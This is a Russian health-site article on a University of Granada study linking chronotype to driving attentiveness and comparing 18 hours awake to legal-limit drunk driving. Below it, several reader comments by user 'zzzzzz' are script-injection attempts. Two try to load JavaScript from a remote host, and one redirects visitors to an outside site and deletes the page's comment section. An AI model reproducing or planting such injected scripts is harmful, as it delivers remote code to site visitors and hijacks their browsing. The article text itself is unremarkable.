Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Во сколько ложиться спать...  >>  Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!
 
Обратная связь
 

Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!

Размер шрифта
25 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Университета Гранады установили, что от того, сова вы или жаворонок, во многом зависит ваше поведение на дороге.

Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!

В зависимости от того, в какое время дня человек наиболее активен, можно определить его так называемый «хронотип». Есть два основных хронотипа – вечерний и утренний. «Для их обозначения ученые обычно используют названия птиц, давно уже привычные нам – это жаворонки (утренний тип) и совы (вечерний тип)», – рассказывает Энджел Корреа, ведущий автор исследования.

Ученые из Университета Гранады проанализировали данные более 500 человек и выбрали из них 29, в которых наиболее ярко проявлялись черты каждого из типов. Все участники эксперимента подробно рассказали о своем режиме дня. Затем все они прошли тест на симуляторе вождения автомобиля. Представители как утреннего, так и вечернего типов проходили этот тест в восемь утра и в восемь вечера.

Люди вечернего типа – совы – оказались худшими водителями, они были невнимательны на дороге в то время дня, которое было для них наименее подходящим (раннее утро), в то время как вечером никаких отклонений замечено не было. В то же время люди утреннего типа (жаворонки) были гораздо более стабильны и вели машину примерно с одинаковой аккуратностью как утром, так и вечером.

Основываясь на полученных результатах, ученые рекомендуют работодателям проводить тесты среди своих сотрудников, чтобы определить их оптимальное время работы (утро или вечер), а также подстраивать расписания под индивидуальный хронотип сотрудника. «Некоторые профессии требуют предельного внимания и концентрации – речь идет о пилотах самолетов, авиадиспетчерах, хирургах, водителях грузовиков и многих других», – отмечает Корреа. «И для работника очень важно выбрать оптимальное время дня для выполнения таких задач. Однако есть определенные промежутки времени, в которые трудно работается абсолютно всем – это послеобеденный период, а также период с трех до пяти часов утра».

Также ученые из Университета Гранады предупреждают, что вождение автомобиля после 18 часов бодрствования настолько же рискованно, насколько и вождение с максимально допустимым уровнем алкоголя в крови – в обоих случаях концентрация внимания значительно снижается.

Попробуйте последовать совету ученых, выполняйте самую сложную часть работы тогда, когда вы полны энергии, «жаворонки» – утром, а «совы» – вечером. Результаты не заставят себя ждать.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - tatiana123

27 мая 2015 в 16:41

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:21

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:16

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как прикорнуть и зарядиться энергией на день   Как выспаться   Бессонные ночи делают из любимых врагов   4 врага сна и как их победить  
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 15 июля 2013Сколько нужно спать, чтобы помнить все
 
17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть? 30 января 2013Хотите не чувствовать боли – спите дольше
 

Слайдшоу

1
Что крадет ваш сон
Что с моим сном
Профессии, которые убивают ваш сон

Тесты

1
Будет ли у вас инфаркт?
Хорошо ли Вы спите?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.